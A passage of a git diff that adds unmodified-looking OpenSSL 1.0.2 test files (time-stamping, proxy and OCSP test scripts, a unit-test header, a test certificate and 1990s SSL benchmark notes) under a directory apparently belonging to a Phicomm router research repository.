+$		mcr 'texe_dir'ssltest -v -bio_pair -tls1 -cert [-.apps]server2.pem -dhe1024dsa -num 10 -f -time
+$		if $severity .ne. 1 then goto exit3
+$	    endif
+$	endif
+$
+$	RET = 1
+$	goto exit
+$ exit3:
+$	RET = 3
+$ exit:
+$	if p3 .eqs. "" then delete certs.tmp;*
+$	set on
+$	exit 'RET'
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testsslproxy b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testsslproxy
new file mode 100644
index 0000000..58bbda8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testsslproxy
@@ -0,0 +1,10 @@
+#! /bin/sh
+
+echo 'Testing a lot of proxy conditions.'
+echo 'Some of them may turn out being invalid, which is fine.'
+for auth in A B C BC; do
+    for cond in A B C 'A|B&!C'; do
+	sh ./testssl $1 $2 $3 "-proxy -proxy_auth $auth -proxy_cond $cond"
+	if [ $? = 3 ]; then exit 1; fi
+    done
+done
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testtsa b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testtsa
new file mode 100644
index 0000000..bb653b5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testtsa
@@ -0,0 +1,238 @@
+#!/bin/sh
+
+#
+# A few very basic tests for the 'ts' time stamping authority command.
+#
+
+SH="/bin/sh"
+if test "$OSTYPE" = msdosdjgpp; then
+    PATH="../apps\;$PATH"
+else
+    PATH="../apps:$PATH"
+fi
+export SH PATH
+
+OPENSSL_CONF="../CAtsa.cnf"
+export OPENSSL_CONF
+# Because that's what ../apps/CA.sh really looks at
+SSLEAY_CONFIG="-config $OPENSSL_CONF"
+export SSLEAY_CONFIG
+
+OPENSSL="`pwd`/../util/opensslwrap.sh"
+export OPENSSL
+
+error () {
+
+    echo "TSA test failed!" >&2
+    exit 1
+}
+
+setup_dir () {
+
+    rm -rf tsa 2>/dev/null
+    mkdir tsa
+    cd ./tsa
+}
+
+clean_up_dir () {
+
+    cd ..
+    rm -rf tsa
+}
+
+create_ca () {
+
+    echo "Creating a new CA for the TSA tests..."
+    TSDNSECT=ts_ca_dn
+    export TSDNSECT   
+    ../../util/shlib_wrap.sh ../../apps/openssl req -new -x509 -nodes \
+	-out tsaca.pem -keyout tsacakey.pem
+    test $? != 0 && error
+}
+
+create_tsa_cert () {
+
+    INDEX=$1
+    export INDEX
+    EXT=$2
+    TSDNSECT=ts_cert_dn
+    export TSDNSECT   
+
+    ../../util/shlib_wrap.sh ../../apps/openssl req -new \
+	-out tsa_req${INDEX}.pem -keyout tsa_key${INDEX}.pem
+    test $? != 0 && error
+echo Using extension $EXT
+    ../../util/shlib_wrap.sh ../../apps/openssl x509 -req \
+	-in tsa_req${INDEX}.pem -out tsa_cert${INDEX}.pem \
+	-CA tsaca.pem -CAkey tsacakey.pem -CAcreateserial \
+	-extfile $OPENSSL_CONF -extensions $EXT
+    test $? != 0 && error
+}
+
+print_request () {
+
+    ../../util/shlib_wrap.sh ../../apps/openssl ts -query -in $1 -text
+}
+
+create_time_stamp_request1 () {
+
+    ../../util/shlib_wrap.sh ../../apps/openssl ts -query -data ../testtsa -policy tsa_policy1 -cert -out req1.tsq
+    test $? != 0 && error
+}
+
+create_time_stamp_request2 () {
+
+    ../../util/shlib_wrap.sh ../../apps/openssl ts -query -data ../testtsa -policy tsa_policy2 -no_nonce \
+	-out req2.tsq
+    test $? != 0 && error
+}
+
+create_time_stamp_request3 () {
+
+    ../../util/shlib_wrap.sh ../../apps/openssl ts -query -data ../CAtsa.cnf -no_nonce -out req3.tsq
+    test $? != 0 && error
+}
+
+print_response () {
+
+    ../../util/shlib_wrap.sh ../../apps/openssl ts -reply -in $1 -text
+    test $? != 0 && error
+}
+
+create_time_stamp_response () {
+
+    ../../util/shlib_wrap.sh ../../apps/openssl ts -reply -section $3 -queryfile $1 -out $2
+    test $? != 0 && error
+}
+
+time_stamp_response_token_test () {
+
+    RESPONSE2=$2.copy.tsr
+    TOKEN_DER=$2.token.der
+    ../../util/shlib_wrap.sh ../../apps/openssl ts -reply -in $2 -out $TOKEN_DER -token_out
+    test $? != 0 && error
+    ../../util/shlib_wrap.sh ../../apps/openssl ts -reply -in $TOKEN_DER -token_in -out $RESPONSE2
+    test $? != 0 && error
+    cmp $RESPONSE2 $2
+    test $? != 0 && error
+    ../../util/shlib_wrap.sh ../../apps/openssl ts -reply -in $2 -text -token_out
+    test $? != 0 && error
+    ../../util/shlib_wrap.sh ../../apps/openssl ts -reply -in $TOKEN_DER -token_in -text -token_out
+    test $? != 0 && error
+    ../../util/shlib_wrap.sh ../../apps/openssl ts -reply -queryfile $1 -text -token_out
+    test $? != 0 && error
+}
+
+verify_time_stamp_response () {
+
+    ../../util/shlib_wrap.sh ../../apps/openssl ts -verify -queryfile $1 -in $2 -CAfile tsaca.pem \
+	-untrusted tsa_cert1.pem
+    test $? != 0 && error
+    ../../util/shlib_wrap.sh ../../apps/openssl ts -verify -data $3 -in $2 -CAfile tsaca.pem \
+	-untrusted tsa_cert1.pem
+    test $? != 0 && error
+}
+
+verify_time_stamp_token () {
+
+    # create the token from the response first
+    ../../util/shlib_wrap.sh ../../apps/openssl ts -reply -in $2 -out $2.token -token_out
+    test $? != 0 && error
+    ../../util/shlib_wrap.sh ../../apps/openssl ts -verify -queryfile $1 -in $2.token -token_in \
+	-CAfile tsaca.pem -untrusted tsa_cert1.pem
+    test $? != 0 && error
+    ../../util/shlib_wrap.sh ../../apps/openssl ts -verify -data $3 -in $2.token -token_in \
+	-CAfile tsaca.pem -untrusted tsa_cert1.pem
+    test $? != 0 && error
+}
+
+verify_time_stamp_response_fail () {
+
+    ../../util/shlib_wrap.sh ../../apps/openssl ts -verify -queryfile $1 -in $2 -CAfile tsaca.pem \
+	-untrusted tsa_cert1.pem
+    # Checks if the verification failed, as it should have.
+    test $? = 0 && error
+    echo Ok
+}
+
+# main functions
+
+echo "Setting up TSA test directory..."
+setup_dir
+
+echo "Creating CA for TSA tests..."
+create_ca
+
+echo "Creating tsa_cert1.pem TSA server cert..."
+create_tsa_cert 1 tsa_cert
+
+echo "Creating tsa_cert2.pem non-TSA server cert..."
+create_tsa_cert 2 non_tsa_cert
+
+echo "Creating req1.req time stamp request for file testtsa..."
+create_time_stamp_request1
+
+echo "Printing req1.req..."
+print_request req1.tsq
+
+echo "Generating valid response for req1.req..."
+create_time_stamp_response req1.tsq resp1.tsr tsa_config1
+
+echo "Printing response..."
+print_response resp1.tsr
+
+echo "Verifying valid response..."
+verify_time_stamp_response req1.tsq resp1.tsr ../testtsa
+
+echo "Verifying valid token..."
+verify_time_stamp_token req1.tsq resp1.tsr ../testtsa
+
+# The tests below are commented out, because invalid signer certificates
+# can no longer be specified in the config file.
+
+# echo "Generating _invalid_ response for req1.req..."
+# create_time_stamp_response req1.tsq resp1_bad.tsr tsa_config2
+
+# echo "Printing response..."
+# print_response resp1_bad.tsr
+
+# echo "Verifying invalid response, it should fail..."
+# verify_time_stamp_response_fail req1.tsq resp1_bad.tsr
+
+echo "Creating req2.req time stamp request for file testtsa..."
+create_time_stamp_request2
+
+echo "Printing req2.req..."
+print_request req2.tsq
+
+echo "Generating valid response for req2.req..."
+create_time_stamp_response req2.tsq resp2.tsr tsa_config1
+
+echo "Checking '-token_in' and '-token_out' options with '-reply'..."
+time_stamp_response_token_test req2.tsq resp2.tsr
+
+echo "Printing response..."
+print_response resp2.tsr
+
+echo "Verifying valid response..."
+verify_time_stamp_response req2.tsq resp2.tsr ../testtsa
+
+echo "Verifying response against wrong request, it should fail..."
+verify_time_stamp_response_fail req1.tsq resp2.tsr
+
+echo "Verifying response against wrong request, it should fail..."
+verify_time_stamp_response_fail req2.tsq resp1.tsr
+
+echo "Creating req3.req time stamp request for file CAtsa.cnf..."
+create_time_stamp_request3
+
+echo "Printing req3.req..."
+print_request req3.tsq
+
+echo "Verifying response against wrong request, it should fail..."
+verify_time_stamp_response_fail req3.tsq resp1.tsr
+
+echo "Cleaning up..."
+clean_up_dir
+
+exit 0
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testtsa.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testtsa.com
new file mode 100644
index 0000000..29fb1d0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testtsa.com
@@ -0,0 +1,255 @@
+$!
+$! A few very basic tests for the 'ts' time stamping authority command.
+$!
+$
+$	__arch = "VAX"
+$	if f$getsyi("cpu") .ge. 128 then -
+	   __arch = f$edit( f$getsyi( "ARCH_NAME"), "UPCASE")
+$	if __arch .eqs. "" then __arch = "UNK"
+$!
+$	if (p4 .eqs. "64") then __arch = __arch+ "_64"
+$!
+$	exe_dir = "sys$disk:[-.''__arch'.exe.apps]"
+$
+$	openssl = "mcr ''f$parse(exe_dir+"openssl.exe")'"
+$	OPENSSL_CONF = "[-]CAtsa.cnf"
+$	! Because that's what ../apps/CA.sh really looks at
+$	SSLEAY_CONFIG = "-config " + OPENSSL_CONF
+$
+$ error:
+$	subroutine
+$		write sys$error "TSA test failed!"
+$		exit 3
+$	endsubroutine
+$
+$ setup_dir:
+$	subroutine
+$
+$		if f$search("tsa.dir") .nes ""
+$		then
+$			@[-.util]deltree [.tsa]*.*
+$ 			set file/prot=(S:RWED,O:RWED,G:RWED,W:RWED) tsa.dir;*
+$ 			delete tsa.dir;*
+$		endif
+$
+$		create/dir [.tsa]
+$		set default [.tsa]
+$	endsubroutine
+$
+$ clean_up_dir:
+$	subroutine
+$
+$		set default [-]
+$		@[-.util]deltree [.tsa]*.*
+$ 		set file/prot=(S:RWED,O:RWED,G:RWED,W:RWED) tsa.dir;*
+$ 		delete tsa.dir;*
+$	endsubroutine
+$
+$ create_ca:
+$	subroutine
+$
+$		write sys$output "Creating a new CA for the TSA tests..."
+$		TSDNSECT = "ts_ca_dn"
+$		openssl req -new -x509 -nodes -
+			-out tsaca.pem -keyout tsacakey.pem
+$		if $severity .ne. 1 then call error
+$	endsubroutine
+$
+$ create_tsa_cert:
+$	subroutine
+$
+$		INDEX=p1
+$		EXT=p2
+$		TSDNSECT = "ts_cert_dn"
+$
+$		openssl req -new -
+			-out tsa_req'INDEX'.pem -keyout tsa_key'INDEX'.pem
+$		if $severity .ne. 1 then call error
+$
+$		write sys$output "Using extension ''EXT'"
+$		openssl x509 -req -
+			-in tsa_req'INDEX'.pem -out tsa_cert'INDEX'.pem -
+			"-CA" tsaca.pem "-CAkey" tsacakey.pem "-CAcreateserial" -
+			-extfile 'OPENSSL_CONF' -extensions "''EXT'"
+$		if $severity .ne. 1 then call error
+$	endsubroutine
+$
+$ print_request:
+$	subroutine
+$
+$		openssl ts -query -in 'p1' -text
+$	endsubroutine
+$
+$ create_time_stamp_request1: subroutine
+$
+$		openssl ts -query -data [-]testtsa.com -policy tsa_policy1 -
+			-cert -out req1.tsq
+$		if $severity .ne. 1 then call error
+$	endsubroutine
+$
+$ create_time_stamp_request2: subroutine
+$
+$		openssl ts -query -data [-]testtsa.com -policy tsa_policy2 -
+			-no_nonce -out req2.tsq
+$		if $severity .ne. 1 then call error
+$	endsubroutine
+$
+$ create_time_stamp_request3: subroutine
+$
+$		openssl ts -query -data [-]CAtsa.cnf -no_nonce -out req3.tsq
+$		if $severity .ne. 1 then call error
+$	endsubroutine
+$
+$ print_response:
+$	subroutine
+$
+$		openssl ts -reply -in 'p1' -text
+$		if $severity .ne. 1 then call error
+$	endsubroutine
+$
+$ create_time_stamp_response:
+$	subroutine
+$
+$		openssl ts -reply -section 'p3' -queryfile 'p1' -out 'p2'
+$		if $severity .ne. 1 then call error
+$	endsubroutine
+$
+$ time_stamp_response_token_test:
+$	subroutine
+$
+$		RESPONSE2 = p2+ "-copy_tsr"
+$		TOKEN_DER = p2+ "-token_der"
+$		openssl ts -reply -in 'p2' -out 'TOKEN_DER' -token_out
+$		if $severity .ne. 1 then call error
+$		openssl ts -reply -in 'TOKEN_DER' -token_in -out 'RESPONSE2'
+$		if $severity .ne. 1 then call error
+$		backup/compare 'RESPONSE2' 'p2'
+$		if $severity .ne. 1 then call error
+$		openssl ts -reply -in 'p2' -text -token_out
+$		if $severity .ne. 1 then call error
+$		openssl ts -reply -in 'TOKEN_DER' -token_in -text -token_out
+$		if $severity .ne. 1 then call error
+$		openssl ts -reply -queryfile 'p1' -text -token_out
+$		if $severity .ne. 1 then call error
+$	endsubroutine
+$
+$ verify_time_stamp_response:
+$	subroutine
+$
+$		openssl ts -verify -queryfile 'p1' -in 'p2' -
+			"-CAfile" tsaca.pem -untrusted tsa_cert1.pem
+$		if $severity .ne. 1 then call error
+$		openssl ts -verify -data 'p3' -in 'p2' -
+			"-CAfile" tsaca.pem -untrusted tsa_cert1.pem
+$		if $severity .ne. 1 then call error
+$	endsubroutine
+$
+$ verify_time_stamp_token:
+$	subroutine
+$
+$		! create the token from the response first
+$		openssl ts -reply -in "''p2'" -out "''p2'-token" -token_out
+$		if $severity .ne. 1 then call error
+$		openssl ts -verify -queryfile "''p1'" -in "''p2'-token" -
+		 -token_in "-CAfile" tsaca.pem -untrusted tsa_cert1.pem
+$		if $severity .ne. 1 then call error
+$		openssl ts -verify -data "''p3'" -in "''p2'-token" -
+		 -token_in "-CAfile" tsaca.pem -untrusted tsa_cert1.pem
+$		if $severity .ne. 1 then call error
+$	endsubroutine
+$
+$ verify_time_stamp_response_fail:
+$	subroutine
+$
+$		openssl ts -verify -queryfile 'p1' -in 'p2' -
+			"-CAfile" tsaca.pem -untrusted tsa_cert1.pem
+$		! Checks if the verification failed, as it should have.
+$		if $severity .eq. 1 then call error
+$		write sys$output "Ok"
+$	endsubroutine
+$
+$	! Main body ----------------------------------------------------------
+$
+$	set noon
+$
+$	write sys$output "Setting up TSA test directory..."
+$	call setup_dir
+$
+$	write sys$output "Creating CA for TSA tests..."
+$	call create_ca
+$
+$	write sys$output "Creating tsa_cert1.pem TSA server cert..."
+$	call create_tsa_cert 1 "tsa_cert"
+$
+$	write sys$output "Creating tsa_cert2.pem non-TSA server cert..."
+$	call create_tsa_cert 2 "non_tsa_cert"
+$
+$	write sys$output "Creating req1.req time stamp request for file testtsa..."
+$	call create_time_stamp_request1
+$
+$	write sys$output "Printing req1.req..."
+$	call print_request "req1.tsq"
+$
+$	write sys$output "Generating valid response for req1.req..."
+$	call create_time_stamp_response "req1.tsq" "resp1.tsr" "tsa_config1"
+$
+$	write sys$output "Printing response..."
+$	call print_response "resp1.tsr"
+$
+$	write sys$output "Verifying valid response..."
+$	call verify_time_stamp_response "req1.tsq" "resp1.tsr" "[-]testtsa.com"
+$
+$	write sys$output "Verifying valid token..."
+$	call verify_time_stamp_token "req1.tsq" "resp1.tsr" "[-]testtsa.com"
+$
+$	! The tests below are commented out, because invalid signer certificates
+$	! can no longer be specified in the config file.
+$
+$	! write sys$output "Generating _invalid_ response for req1.req..."
+$	! call create_time_stamp_response "req1.tsq" "resp1_bad.tsr" "tsa_config2"
+$
+$	! write sys$output "Printing response..."
+$	! call print_response "resp1_bad.tsr"
+$
+$	! write sys$output "Verifying invalid response, it should fail..."
+$	! call verify_time_stamp_response_fail "req1.tsq" "resp1_bad.tsr"
+$
+$	write sys$output "Creating req2.req time stamp request for file testtsa..."
+$	call create_time_stamp_request2
+$
+$	write sys$output "Printing req2.req..."
+$	call print_request "req2.tsq"
+$
+$	write sys$output "Generating valid response for req2.req..."
+$	call create_time_stamp_response "req2.tsq" "resp2.tsr" "tsa_config1"
+$
+$	write sys$output "Checking '-token_in' and '-token_out' options with '-reply'..."
+$	call time_stamp_response_token_test "req2.tsq" "resp2.tsr"
+$
+$	write sys$output "Printing response..."
+$	call print_response "resp2.tsr"
+$
+$	write sys$output "Verifying valid response..."
+$	call verify_time_stamp_response "req2.tsq" "resp2.tsr" "[-]testtsa.com"
+$
+$	write sys$output "Verifying response against wrong request, it should fail..."
+$	call verify_time_stamp_response_fail "req1.tsq" "resp2.tsr"
+$
+$	write sys$output "Verifying response against wrong request, it should fail..."
+$	call verify_time_stamp_response_fail "req2.tsq" "resp1.tsr"
+$
+$	write sys$output "Creating req3.req time stamp request for file CAtsa.cnf..."
+$	call create_time_stamp_request3
+$
+$	write sys$output "Printing req3.req..."
+$	call print_request "req3.tsq"
+$
+$	write sys$output "Verifying response against wrong request, it should fail..."
+$	call verify_time_stamp_response_fail "req3.tsq" "resp1.tsr"
+$
+$	write sys$output "Cleaning up..."
+$	call clean_up_dir
+$
+$	set on
+$
+$	exit
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testutil.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testutil.h
new file mode 100644
index 0000000..75f0c8a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testutil.h
@@ -0,0 +1,118 @@
+/* test/testutil.h */
+/*-
+ * Utilities for writing OpenSSL unit tests.
+ *
+ * More information:
+ * http://wiki.openssl.org/index.php/How_To_Write_Unit_Tests_For_OpenSSL
+ *
+ * Author: Mike Bland (mbland@acm.org)
+ * Date:   2014-06-07
+ * ====================================================================
+ * Copyright (c) 2014 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#ifndef HEADER_TESTUTIL_H
+# define HEADER_TESTUTIL_H
+
+/*-
+ * SETUP_TEST_FIXTURE and EXECUTE_TEST macros for test case functions.
+ *
+ * SETUP_TEST_FIXTURE will call set_up() to create a new TEST_FIXTURE_TYPE
+ * object called "fixture". It will also allocate the "result" variable used
+ * by EXECUTE_TEST. set_up() should take a const char* specifying the test
+ * case name and return a TEST_FIXTURE_TYPE by value.
+ *
+ * EXECUTE_TEST will pass fixture to execute_func() by value, call
+ * tear_down(), and return the result of execute_func(). execute_func() should
+ * take a TEST_FIXTURE_TYPE by value and return zero on success or one on
+ * failure.
+ *
+ * Unit tests can define their own SETUP_TEST_FIXTURE and EXECUTE_TEST
+ * variations like so:
+ *
+ * #define SETUP_FOOBAR_TEST_FIXTURE()\
+ *   SETUP_TEST_FIXTURE(FOOBAR_TEST_FIXTURE, set_up_foobar)
+ *
+ * #define EXECUTE_FOOBAR_TEST()\
+ *   EXECUTE_TEST(execute_foobar, tear_down_foobar)
+ *
+ * Then test case functions can take the form:
+ *
+ * static int test_foobar_feature()
+ *      {
+ *      SETUP_FOOBAR_TEST_FIXTURE();
+ *      [...set individual members of fixture...]
+ *      EXECUTE_FOOBAR_TEST();
+ *      }
+ */
+# define SETUP_TEST_FIXTURE(TEST_FIXTURE_TYPE, set_up)\
+        TEST_FIXTURE_TYPE fixture = set_up(TEST_CASE_NAME);\
+        int result = 0
+
+# define EXECUTE_TEST(execute_func, tear_down)\
+        if (execute_func(fixture) != 0) result = 1;\
+        tear_down(fixture);\
+        return result
+
+/*
+ * TEST_CASE_NAME is defined as the name of the test case function where
+ * possible; otherwise we get by with the file name and line number.
+ */
+# if __STDC_VERSION__ < 199901L
+#  if defined(_MSC_VER)
+#   define TEST_CASE_NAME __FUNCTION__
+#  else
+#   define testutil_stringify_helper(s) #s
+#   define testutil_stringify(s) testutil_stringify_helper(s)
+#   define TEST_CASE_NAME __FILE__ ":" testutil_stringify(__LINE__)
+#  endif                        /* _MSC_VER */
+# else
+#  define TEST_CASE_NAME __func__
+# endif                         /* __STDC_VERSION__ */
+
+#endif                          /* HEADER_TESTUTIL_H */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testx509.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testx509.pem
new file mode 100644
index 0000000..8a85d14
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testx509.pem
@@ -0,0 +1,10 @@
+-----BEGIN CERTIFICATE-----
+MIIBWzCCAQYCARgwDQYJKoZIhvcNAQEEBQAwODELMAkGA1UEBhMCQVUxDDAKBgNV
+BAgTA1FMRDEbMBkGA1UEAxMSU1NMZWF5L3JzYSB0ZXN0IENBMB4XDTk1MDYxOTIz
+MzMxMloXDTk1MDcxNzIzMzMxMlowOjELMAkGA1UEBhMCQVUxDDAKBgNVBAgTA1FM
+RDEdMBsGA1UEAxMUU1NMZWF5L3JzYSB0ZXN0IGNlcnQwXDANBgkqhkiG9w0BAQEF
+AANLADBIAkEAqtt6qS5GTxVxGZYWa0/4u+IwHf7p2LNZbcPBp9/OfIcYAXBQn8hO
+/Re1uwLKXdCjIoaGs4DLdG88rkzfyK5dPQIDAQABMAwGCCqGSIb3DQIFBQADQQAE
+Wc7EcF8po2/ZO6kNCwK/ICH6DobgLekA5lSLr5EvuioZniZp5lFzAw4+YzPQ7XKJ
+zl9HYIMxATFyqSiD9jsx
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/times b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/times
new file mode 100644
index 0000000..01c6bdb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/times
@@ -0,0 +1,113 @@
+
+More number for the questions about SSL overheads....
+
+The following numbers were generated on a Pentium pro 200, running Linux.
+They give an indication of the SSL protocol and encryption overheads.
+
+The program that generated them is an unreleased version of ssl/ssltest.c
+which is the SSLeay ssl protocol testing program.  It is a single process that
+talks both sides of the SSL protocol via a non-blocking memory buffer
+interface.
+
+How do I read this?  The protocol and cipher are reasonable obvious.
+The next number is the number of connections being made.  The next is the
+number of bytes exchanged between the client and server side of the protocol.
+This is the number of bytes that the client sends to the server, and then
+the server sends back.  Because this is all happening in one process,
+the data is being encrypted, decrypted, encrypted and then decrypted again.
+It is a round trip of that many bytes.  Because the one process performs
+both the client and server sides of the protocol and it sends this many bytes
+each direction, multiply this number by 4 to generate the number
+of bytes encrypted/decrypted/MACed.  The first time value is how many seconds
+elapsed doing a full SSL handshake, the second is the cost of one
+full handshake and the rest being session-id reuse.
+
+SSLv2 RC4-MD5      1000 x      1   12.83s   0.70s
+SSLv3 NULL-MD5     1000 x      1   14.35s   1.47s
+SSLv3 RC4-MD5      1000 x      1   14.46s   1.56s
+SSLv3 RC4-MD5      1000 x      1   51.93s   1.62s 1024bit RSA
+SSLv3 RC4-SHA      1000 x      1   14.61s   1.83s
+SSLv3 DES-CBC-SHA  1000 x      1   14.70s   1.89s
+SSLv3 DES-CBC3-SHA 1000 x      1   15.16s   2.16s
+
+SSLv2 RC4-MD5      1000 x   1024   13.72s   1.27s
+SSLv3 NULL-MD5     1000 x   1024   14.79s   1.92s
+SSLv3 RC4-MD5      1000 x   1024   52.58s   2.29s 1024bit RSA
+SSLv3 RC4-SHA      1000 x   1024   15.39s   2.67s
+SSLv3 DES-CBC-SHA  1000 x   1024   16.45s   3.55s
+SSLv3 DES-CBC3-SHA 1000 x   1024   18.21s   5.38s
+
+SSLv2 RC4-MD5      1000 x  10240   18.97s   6.52s
+SSLv3 NULL-MD5     1000 x  10240   17.79s   5.11s
+SSLv3 RC4-MD5      1000 x  10240   20.25s   7.90s
+SSLv3 RC4-MD5      1000 x  10240   58.26s   8.08s 1024bit RSA
+SSLv3 RC4-SHA      1000 x  10240   22.96s  11.44s
+SSLv3 DES-CBC-SHA  1000 x  10240   30.65s  18.41s
+SSLv3 DES-CBC3-SHA 1000 x  10240   47.04s  34.53s
+
+SSLv2 RC4-MD5      1000 x 102400   70.22s  57.74s
+SSLv3 NULL-MD5     1000 x 102400   43.73s  31.03s
+SSLv3 RC4-MD5      1000 x 102400   71.32s  58.83s
+SSLv3 RC4-MD5      1000 x 102400  109.66s  59.20s 1024bit RSA
+SSLv3 RC4-SHA      1000 x 102400   95.88s  82.21s
+SSLv3 DES-CBC-SHA  1000 x 102400  173.22s 160.55s
+SSLv3 DES-CBC3-SHA 1000 x 102400  336.61s 323.82s
+
+What does this all mean?  Well for a server, with no session-id reuse, with
+a transfer size of 10240 bytes, using RC4-MD5 and a 512bit server key,
+a Pentium pro 200 running Linux can handle the SSLv3 protocol overheads of
+about 49 connections a second.  Reality will be quite different :-).
+
+Remember the first number is 1000 full ssl handshakes, the second is
+1 full and 999 with session-id reuse.  The RSA overheads for each exchange
+would be one public and one private operation, but the protocol/MAC/cipher
+cost would be quite similar in both the client and server.
+
+eric (adding numbers to speculation)
+
+--- Appendix ---
+- The time measured is user time but these number a very rough.
+- Remember this is the cost of both client and server sides of the protocol.
+- The TCP/kernel overhead of connection establishment is normally the
+  killer in SSL.  Often delays in the TCP protocol will make session-id
+  reuse look slower that new sessions, but this would not be the case on
+  a loaded server.
+- The TCP round trip latencies, while slowing individual connections,
+  would have minimal impact on throughput.
+- Instead of sending one 102400 byte buffer, one 8k buffer is sent until
+- the required number of bytes are processed.
+- The SSLv3 connections were actually SSLv2 compatible SSLv3 headers.
+- A 512bit server key was being used except where noted.
+- No server key verification was being performed on the client side of the
+  protocol.  This would slow things down very little.
+- The library being used is SSLeay 0.8.x.
+- The normal measuring system was commands of the form
+  time ./ssltest -num 1000 -bytes 102400 -cipher DES-CBC-SHA -reuse
+  This modified version of ssltest should be in the next public release of
+  SSLeay.
+
+The general cipher performance number for this platform are
+
+SSLeay 0.8.2a 04-Sep-1997
+built on Fri Sep  5 17:37:05 EST 1997
+options:bn(64,32) md2(int) rc4(idx,int) des(ptr,risc1,16,long) idea(int) blowfish(ptr2)
+C flags:gcc -DL_ENDIAN -DTERMIOS -O3 -fomit-frame-pointer -m486 -Wall -Wuninitialized 
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2               131.02k      368.41k      500.57k      549.21k      566.09k
+mdc2              535.60k      589.10k      595.88k      595.97k      594.54k
+md5              1801.53k     9674.77k    17484.03k    21849.43k    23592.96k
+sha              1261.63k     5533.25k     9285.63k    11187.88k    11913.90k
+sha1             1103.13k     4782.53k     7933.78k     9472.34k    10070.70k
+rc4             10722.53k    14443.93k    15215.79k    15299.24k    15219.59k
+des cbc          3286.57k     3827.73k     3913.39k     3931.82k     3926.70k
+des ede3         1443.50k     1549.08k     1561.17k     1566.38k     1564.67k
+idea cbc         2203.64k     2508.16k     2538.33k     2543.62k     2547.71k
+rc2 cbc          1430.94k     1511.59k     1524.82k     1527.13k     1523.33k
+blowfish cbc     4716.07k     5965.82k     6190.17k     6243.67k     6234.11k
+                  sign    verify
+rsa  512 bits   0.0100s   0.0011s
+rsa 1024 bits   0.0451s   0.0012s
+rsa 2048 bits   0.2605s   0.0086s
+rsa 4096 bits   1.6883s   0.0302s
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tocsp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tocsp
new file mode 100644
index 0000000..5fc291c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tocsp
@@ -0,0 +1,147 @@
+#!/bin/sh
+
+cmd='../util/shlib_wrap.sh ../apps/openssl'
+ocspdir="ocsp-tests"
+# 17 December 2012 so we don't get certificate expiry errors.
+check_time="-attime 1355875200"
+
+test_ocsp () {
+
+	$cmd base64 -d -in $ocspdir/$1 | \
+		$cmd ocsp -respin - -partial_chain $check_time \
